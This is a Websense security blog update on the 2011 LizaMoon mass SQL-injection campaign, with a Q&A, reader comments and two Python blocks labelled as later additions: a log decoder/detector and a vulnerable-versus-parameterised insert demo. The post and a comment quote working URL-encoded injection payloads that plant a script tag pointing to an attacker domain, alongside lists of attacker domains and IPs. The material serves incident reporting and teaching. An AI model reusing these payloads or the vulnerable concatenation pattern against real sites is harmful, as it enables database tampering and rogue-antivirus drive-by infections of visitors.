Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

Update on LizaMoon mass-injection and Q&A


Posted: 31 Mar 2011 01:03 PM | Patrik Runald | 50 comment(s)


The LizaMoon mass-injection campaign is still ongoing, and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in exactly the same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always a great indicator of how prevalent or widespread an attack is, because Google counts each unique URL or page, not each domain or site, but they do give some indication of the scope of the problem if you look at how the numbers go up or down over time.

 

 

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

 

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php

 

List updated: 4/1/2011 12:16pm PT

 

The domain stats-master111.info was registered on October 21, 2010, which could mean the first attack happened then, but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

 

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

 

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

 

More information is available over on Stackoverflow.com.
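As an added example (this is not code from the Websense post), here is a small Python tool that URL-decodes a query string of the shape shown above, spells out each char(N)+char(N)+... run, and flags requests of that shape in simplified web-server log lines. The log lines, timestamps and client IP addresses are constructed; the query string is the statement quoted above, copied verbatim. Run on that statement, the decoder shows that the char() chain spells `</title><script src=http://google-stats50.info/ur.php></script>`, and that the surrounding statement hands that string to REPLACE with char(32), a space, as the replacement. The detection heuristic (an UPDATE ... SET statement together with a char() run of eight or more characters) is my own assumption, not something the post specifies.

```python
import re
from urllib.parse import unquote_plus

# The URL-encoded statement quoted in the post, copied verbatim (the line breaks
# are the page's own wrapping; the literals concatenate back into one string).
PAGE_PAYLOAD = (
    "+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)"
    "%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)"
    "%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)"
    "%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)"
    "%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)"
    "%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)"
    "%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)"
    "%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)"
    "%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)"
    "+as+varchar(8)))--"
)

# One run of char(N)+char(N)+... as it looks after URL decoding (%2B becomes '+').
# The leading \b keeps "varchar(8000)" from being mistaken for a char() call.
CHAIN_RE = re.compile(r"\bchar\(\d+\)(?:\+char\(\d+\))*", re.IGNORECASE)


def decode_char_chains(query):
    """Return the string each char(N)+char(N)+... run in a query string spells out."""
    decoded = unquote_plus(query)  # '+' -> ' ', '%2B' -> '+'
    chains = []
    for m in CHAIN_RE.finditer(decoded):
        codes = [int(n) for n in re.findall(r"\d+", m.group(0))]
        chains.append("".join(chr(c) for c in codes))
    return chains


def analyze_query(query):
    """Heuristic (assumption): flag a query string carrying UPDATE ... SET together
    with a char() chain of eight or more characters. Returns a dict or None."""
    decoded = unquote_plus(query)
    has_update = re.search(r"\bupdate\b.+\bset\b", decoded, re.IGNORECASE | re.DOTALL)
    chains = decode_char_chains(query)
    longest = max((len(c) for c in chains), default=0)
    if has_update and longest >= 8:
        return {"decoded_sql": decoded, "chains": chains}
    return None


def scan_log(lines):
    """Scan simplified log lines: date time client-ip method uri-stem uri-query status."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7:
            continue  # not a request line in the expected shape
        _date, _time, client_ip, _method, stem, query, _status = parts[:7]
        hit = analyze_query(query)
        if hit:
            findings.append({"client_ip": client_ip, "uri": stem, **hit})
    return findings


# Constructed sample log; the second line carries the page's payload as its query string.
SAMPLE_LOG = [
    "2011-03-31 10:00:01 203.0.113.5 GET /products.asp id=42 200",
    "2011-03-31 10:00:02 198.51.100.7 GET /page.asp id=1'" + PAGE_PAYLOAD + " 200",
    "2011-03-31 10:00:03 203.0.113.9 GET /news.asp q=update+on+sales 200",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client_ip"], f["uri"])
        for chain in f["chains"]:
            print("  char() chain spells:", repr(chain))
```

The same decoder works on the variant quoted in the comments below, which differs only in the two digits of the domain name and in appending the tag with `+` instead of passing it to REPLACE.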

 

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated, which is somewhat unusual. All the code does is redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

 


What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does, and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

 

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

 

 

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. It's a very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

 

 

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense ThreatSeeker Network, and here's a graph of where those users are located.


So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and of how we stated that iTunes URLs had been compromised but the script had been neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

 

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

 

Questions & Answers about the LizaMoon mass-injection

 

Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign, created on March 25, 2011, was called lizamoon.com.

 

Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results, but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected is significantly smaller.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

 

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

 

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to this being a vulnerability in a web application. We don't know which one(s) yet, but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself; it means that the web application isn't filtering input from the user correctly.
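To show what "the web application isn't filtering input correctly" means in code, here is an added example (not code from Websense or from any of the affected applications). An in-memory SQLite database stands in for the site's SQL Server, and a comment-posting function is written twice: once by pasting user input into the SQL text, which lets a stacked UPDATE tack a tag onto every page title, and once with a bound parameter, where the same input is stored as plain text. The hostile comment, the page table and the injected tag are all constructed, the domain in the tag is a placeholder, and SQLite's `||` plays the role of T-SQL's `+`. The last two functions cover the clean-up side mentioned elsewhere on this page: a triage query for rows that already carry a script tag and a REPLACE() update in the same form as the statement in the SQL Injection section, except that it removes the tag outright instead of putting a space in its place.

```python
import sqlite3

# Constructed marker standing in for the injected tag; the domain is a placeholder.
INJECTED_TAG = "</title><script src=http://example.invalid/ur.php></script>"

# Constructed input: closes the string literal, appends the tag to every title
# (SQLite's || is T-SQL's +), and the trailing -- comments out the original quote.
HOSTILE_COMMENT = "nice'); UPDATE pages SET title = title || '" + INJECTED_TAG + "'; --"


def make_db():
    """In-memory SQLite stands in for the site's database (SQLite, not SQL Server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages (title) VALUES (?)", [("Home",), ("About",)])
    conn.commit()
    return conn


def add_comment_vulnerable(conn, body):
    """The pattern behind this campaign: user input becomes part of the SQL text.
    executescript() accepts stacked statements, as SQL Server does."""
    sql = "INSERT INTO comments (body) VALUES ('" + body + "')"
    conn.executescript(sql)


def add_comment_safe(conn, body):
    """Parameterised query: the body is bound as data and cannot become SQL."""
    conn.execute("INSERT INTO comments (body) VALUES (?)", (body,))
    conn.commit()


def page_titles(conn):
    return [row[0] for row in conn.execute("SELECT title FROM pages ORDER BY id")]


def find_injected_pages(conn):
    """Triage query: ids of rows that already carry a script tag."""
    return [row[0] for row in
            conn.execute("SELECT id FROM pages WHERE title LIKE '%<script%' ORDER BY id")]


def strip_injected_tag(conn, tag):
    """Clean-up in the REPLACE() form, with the tag bound as a parameter.
    Returns the number of rows changed."""
    cur = conn.execute(
        "UPDATE pages SET title = REPLACE(title, ?, '') WHERE title LIKE ?",
        (tag, "%" + tag + "%"))
    conn.commit()
    return cur.rowcount


def demo(use_safe_code):
    """Post the hostile comment through one of the two functions and report the state."""
    conn = make_db()
    post = add_comment_safe if use_safe_code else add_comment_vulnerable
    post(conn, HOSTILE_COMMENT)
    return {
        "titles": page_titles(conn),
        "injected": find_injected_pages(conn),
        "comments": [row[0] for row in conn.execute("SELECT body FROM comments")],
    }


if __name__ == "__main__":
    print("concatenated SQL:", demo(False))
    print("parameterised SQL:", demo(True))
```

Note that the safe version stores the whole hostile string, including its quote and UPDATE, as an ordinary comment body; filtering characters out of the input is not what protects the titles, binding the value as a parameter is.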

 

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

 

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

 

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

 

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

 

 



Comments

Rick Chisholm said on Thursday, March 31, 2011 5:16 PM

What would be really nice to see is the log showing the injection code at work.

Patrik Runald said on Thursday, March 31, 2011 5:21 PM

The log sample we got was incomplete and didn't show the actual injection so we're still trying to find the actual code ourselves. If any of our readers have a sample, please share it with me at prunald (a) websense.com

Thanks!

Peter Bright said on Thursday, March 31, 2011 6:06 PM

Are the injections still of the form:

GET /path/to/file?param=value'+update+tbl+set+fld=cast(fld+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(52)%2Bchar(57)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))

?

Patrik Runald said on Thursday, March 31, 2011 7:11 PM

Hi Peter,

Yes, that's it. Thanks for sending that in to us!

Bob Easton said on Friday, April 01, 2011 5:24

One article on a BBC news site said that the exploit is seen only by those using Internet Explorer? Is this really the case? Are other browsers "immune" because they fail to execute a script tag buried in a title tag buried in an anchor?

Paul said on Friday, April 01, 2011 6:01

Does this injection do anything malicious to the system or to other systems that it is sent to?

Michael Miller said on Friday, April 01, 2011 6:40

Do you have any steps/tips available for web admins to prevent the injection on their sites?

Michael Felch said on Friday, April 01, 2011 7:32

Sounds similar to the 'Swogmoh' from Blackhat Presentation in Vegas of 2006

www.blackhat.com/.../BH-Fed-06-Hoffman-up.pdf Slides 67-69

Tim Tatum said on Friday, April 01, 2011 8:18

I'm maintaining a SQL-Classic ASP web site.

We've been getting hit on SQL Server 2008

Specifically, Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64)

Maye said on Friday, April 01, 2011 9:59

Lizamoon first made an appearance on March 25th which is also its domain registration date.

P. Townings said on Friday, April 01, 2011 10:08

You can add "books-loader.info" as one of the new redirects.. One infected page that was reported to have the lizamoon.info seems to have books-loader.info as the URL in the injected code.

dent said on Friday, April 01, 2011 10:27

add

google-stats73 . info

google-stats47 . info

google-stats50 . info

etc etc

Clif said on Friday, April 01, 2011 11:17

what would be nice is to have a report by ISP and Hosting company

Emp.Bob said on Friday, April 01, 2011 12:00 PM

can confirm the code,  also he/see tested a site about 6 weeks earlier with

/file.asp?param=vaule'+or+1=@@version

Shame said on Friday, April 01, 2011 12:08 PM

"SQL Server 2003". There is not such version.

B-Rad said on Friday, April 01, 2011 1:28 PM

Another thing to note about this is that it seems three days ago the TweetLister Real estate app may have had its page hacked with the LizaMoon script. I have never used TweetLister but you can see the old tweets here: search.twitter.com/search

Mad Myche said on Friday, April 01, 2011 3:20 PM

Please don't blame the DB Server for poor coding and not sanitizing the data. Slight tweaks could affect other DBs as well, be it MySql, Big Table etc.

Never heard of Sql Server 2003 though...

Donna said on Friday, April 01, 2011 3:36 PM

It drives me crazy to see how often these attacks bring down sites, and their rankings. If your site does get hit, I would contact this guy (he does more than Wordpress): smackdown.blogsblogsblogs.com/.../how-to-completely-clean-your-hacked-wordpress-installation

Joe said on Friday, April 01, 2011 3:39 PM

One of my computers is affected.. What to do help please thanks in advance!

Patrik Runald said on Friday, April 01, 2011 4:13 PM

@Bob Easton No, the attack works against other browsers as well and relies on the user to download and install the file.

@Paul It doesn't install any malicious code on the webserver but it does add the malicious script tag to the Microsoft SQL database so this has to be cleaned up.

@Michael Miller. Standard SQL injection protection techniques. There are lots of great information out there, just search for it.

@Tim Tatum Thanks for the info on SQL 2008, updated the blog post

@P.Townings, @dent Thanks, added them!

@Clif We're talking to several hosting companies but unfortunately can't share the information

@Shame You're right, updated the blog.

Darrell Crone said on Friday, April 01, 2011 5:12 PM

Ok I came to the site that was quoted in all the stories, I'm hosted on Network Solutions, and we got nailed by this. It took down our Vbulletin forums and I also had to reinstall Wordpress for our front end.

My question is this.  Me hosting a website on a virtual server, what can "I" do to stop something like this from happening again, and #2 how do I get rid of the code in the sql database.

Be kind as I am a noob in terms etc to all of this and am learning on the fly..

Thanks!

D/C

panpangoat said on Friday, April 01, 2011 7:33 PM

Could you inject the SQL injection with the Matrix?

No, seriously though, I am curious about one of the details I saw whilst reading some of the data provided. Why would you (it, one?) need a session ID, as in : software-werp[dot]co.cc/.../237 (ect, the example php)

Tony de Brum said on Friday, April 01, 2011 7:33 PM

Was advised to purchase a registry clean up program for 29.95. I did and then got notice of this. Does this attack include an offer to clean up registries which first tells you it will clean up only 100 until you buy the full program? It is listed as ARO 2011..www.sammsoft{dot}com/CustomerSupport.aspx and is from sammsoft. Is this possibly another manifestation of this bug?

Mama said on Friday, April 01, 2011 9:23 PM

If you come across this re-direct hack don't do anything, leave it there and Ctrl+Alt+Del to bring up your task manager and "End Task" to shut down your browser. Just clicking the "X" may actually be an ok to load the program.

dontbecareless said on Friday, April 01, 2011 10:34 PM

This isn't a database system attack, so it matters not which system you use.  It's a bad coding practices attack, that uses the database as its vector.

If your website, in any language, accepts form posts, querystrings, or anything else that is consumed - without any filtering done to it - directly into the database, you are at risk!

You only need to perform a few simple, routine checks on your data to weed out potential attacks, or extraneous SQL code that has been added into your queries.

Comeon people.  Are you still waiting for Obama to fix this for you?  Cause we all know that aint gonna happen!

www.google.com

Sng said on Friday, April 01, 2011 10:57 PM

I got redirected from netsol.com. I quickly tried to stop it, maybe too quickly.  Affected boot somehow.  I could not boot in any mode.  Had to end up reformatting.  Any more like this.

chardar said on Saturday, April 02, 2011 12:36

Hahahah noobs!  Security vulnerabilities are the Achilles heel of your global exploitation policies!  You don't want to pay teams of qualified software engineers to make reliable web software.  Hordes of untrained masses use hardware to sustain the Pyramid.  But when the drones get sick, the Pharaohs fail to receive their adulation!  BWAHAHAH

Francis Turner said on Saturday, April 02, 2011 2:21

This won't help the owners of the websites that have been hacked but network admins may find it useful to block the 8 relevant IP addresses in their firewalls as this will ensure that they/their users will not be infected if they visit one of the hacked sites even if the injection domain changes from one of the dozens posted here.

The IPs are 194.28.44.190, 91.220.35.151, 91.213.29.182, 95.64.9.18, 109.236.81.28 and 91.217.162.45 in the original attack plus the following two 46.252.130.200 and 84.123.115.228 that Dancho Danchev identified as what the malware redirects to.

Of course these addresses may change but it is easier to track them than the domains and, as I note in my blog post on the topic, they will probably be used for something else bad later anyway - blog.threatstop.com/.../blocking-the-lizamoon-ips

Fairportfan said on Saturday, April 02, 2011 6:49

Which (if any) anti-virus/malware programs currently detect this attack?

Jake C said on Saturday, April 02, 2011 9:33

I use Safari and found this plugin Ghostery blocks problems.

Shirley said on Saturday, April 02, 2011 12:05 PM

My first inkling that something was wrong was when I started getting mail delivery failure notices. Since I had not emailed anything out I tried to figure out what caused it.  I received an email from Amazon and it went directly to my inbox.  This is usual so I opened it and clicked through to check their daily deals. I found it added an address to my contact list at the time I received the Amazon email (9:33 am) and sent out emails to everybody in my Contact list.  I received the Amazon email at 9:33 am.  Hovering over the "from" I saw that it said "store-news.amazon.com.  Other emails from Amazon were "news-store.amazon.com". I added the first one to a blocked list and instead of it reading Store-news etc it placed the ampersand in front of the name.  I am assuming that that email was a spammer.  There were at least 3 different messages sent out to my contacts, all of which seemed benign ( I am so happy),  (I finally found it)  etc.  I sent out an apology to all my contacts.  I use a Mac with safari. I don't think it was I-tunes because I don't use I-tunes - I do use microsoft hotmail and I think it came from the amazon email.

I am not a pro at this stuff by any means so I hope this helps someone out there.

Kris said on Saturday, April 02, 2011 12:48 PM

What I would like to know is what specific framework or web applications are being targeted. It can't be just luck that the injection can guess the table structure of your application and thus inject the specific code to get it in your title tag. Brute force would take days and would be very apparent in your logs/traffic. If it is just a few then we can work on sanitizing the inputs.

M. Y. said on Saturday, April 02, 2011 1:38 PM

This article omits several very important points.  Most naive users will have trouble closing the offending web page, even if they recognize it.  It's usually necessary to use Ctrl-Alt-Del to bring up Task Manager, to go to the Applications tab, and to select the browser and force it to end (close).  Unsaved web pages will be lost.

The second omission is the most important.  What if someone does give credit card information to one of these sites?  Well, it may be that the site is "phishing" and the identification and card number will be stolen.  To protect yourself, it's necessary to contact the credit card company, cancel the transaction, cancel the card, and ask for a new card.  It's probably a good idea to lock down your credit reports through the three main reporting agencies as well.  This scam is a perfect avenue for identity theft.  I wish EVERY article about it would mention that--if you are entrapped by this vile scam,  you're giving your credit info to criminals.  What should you expect would happen?

M. Y. said on Saturday, April 02, 2011 1:41 PM

Almost forgot: the best remover I've found for this malware is Malwarebytes available free from:  http://www.malwarebytes.org/  and downloadable from cnet.com.

Both of those sources are safe.  Don't get it anywhere else.  If Malwarebytes won't run or load properly, you have an additional infection.  Use another computer, presumably a clean one, to contact the malwarebytes forum and someone there will help you.  They're very patient and reliable but be prepared to be working on it for several days-- they're not very quick because they are so busy and most of them are volunteers and removing some malware is quite complex.

Charles Hayes said on Saturday, April 02, 2011 5:07 PM

I'd also suggest getting a copy of combofix from bleeping computer and running it on infected machines, as well as Malwarebytes and Hitman Pro *32 or 64 bit*.

Kate O said on Saturday, April 02, 2011 7:03 PM

I've had it happen. I did a search for "little girls, sci fi lit stats" for a kids book I've written and ended up on a porn site. I think it was tava or tavia.com or something. After ending up on the slimy porn pages and leaving, I started getting the redirect bug. So it came, I think, from there. Trend Micro doesn't even detect and annihilate it.

Patrik Runald said on Saturday, April 02, 2011 9:06 PM

We believe it's not just one web application that's vulnerable but several. We're still looking into it.

Islena said on Saturday, April 02, 2011 11:57 PM

I got hit with this, last nite.  Fake "Win 7 Anti-Virus 2011"  pop-ups and pages tried to force me into buying their fix.  I figured it was phoney.  One clue was at the top right of a screen:  option to choose "English, Deutsch, Francais, Spanish".  Hello.  A legitimate site would offer 'espanol' not spanish.  How did I pick up the virus?  I had been on Amazon.  But also am suspicious of a Mexican, independent, underground, news and commentary site.  It has very interesting content but I think vulnerable to this kind of attachment.

Tony white said on Sunday, April 03, 2011 2:32

please reassure me that v6.3 customers are just as well protected as v7 clients?  We've had numerous occasions where sites have been unclassified for our product, but set as malicious site for v7 customers.

Bjarni said on Sunday, April 03, 2011 5:57

They are also using hxxp://books-loader.info/ur.php

Damien said on Sunday, April 03, 2011 7:20

Please do NOT click on link in this post.

The sql provided by Peter is searching in one column called Fieldname, finding every  instance of </title><script src=google-stats50[dot]info/.../script> and replacing it with a single space in the entire table.

Cyberwolff said on Sunday, April 03, 2011 9:12

Seems to me that the credit card companies could bar these transactions and report where those funds would have gone.

This would end the scam and likely bring about the arrest of those involved.

Patrik Runald said on Sunday, April 03, 2011 9:46

@Tony White Yes, all the malicious URLs are categorized for all v6.x customers as well.

Lorraine said on Sunday, April 03, 2011 7:16 PM

I'm not sure if my computer has been attacked with this or not...but there's something called "Windows Repair" keeps coming up and it can't be closed. also it makes all my documents gone! can anyone help? thz!

Randy Smith said on Monday, April 04, 2011 6:32

Malware name may vary - we had to remove "Windows Expansion System" for one of our clients, which had the same graphics as the "Windows Stability Center".  So, be aware that these scareware publishers keep changing names, as has been seen historically.

Darren Stewart said on Monday, April 04, 2011 9:20

Can anyone advise (someone from Websense perhaps) if the Fake-AV infection works in cases where the user is not running as admin?

I created two videos that can assist people on XP if they wish to run as a normal user and not as an admin account (most of the time).

www.youtube.com/watch

www.youtube.com/watch

Regards

Darren

fabian llanos said on Tuesday, April 05, 2011 10:06 PM

Hi Patrik , friends

I got evidence of this malware earlier than March 26,

sites like wayn, flickeer are also infected

fabian llanos said on Tuesday, April 05, 2011 10:17 PM

I have evidence of this software earlier than Mar 26, also it has some "twins" infecting other type of url

Beatrice Aragona said on Thursday, April 07, 2011 7:15

One of the computers in the office was contaminated last night, but it seems to take over everything. Cannot run any AV programs, Cannot get on internet, it won't recognize any disks, email, and the virus even popped up in the Safe mode with networking while we were trying to download a new anti virus.

deirdre said on Thursday, April 07, 2011 4:05 PM

my son's computer has been taken over by this virus- how do I get rid of it?

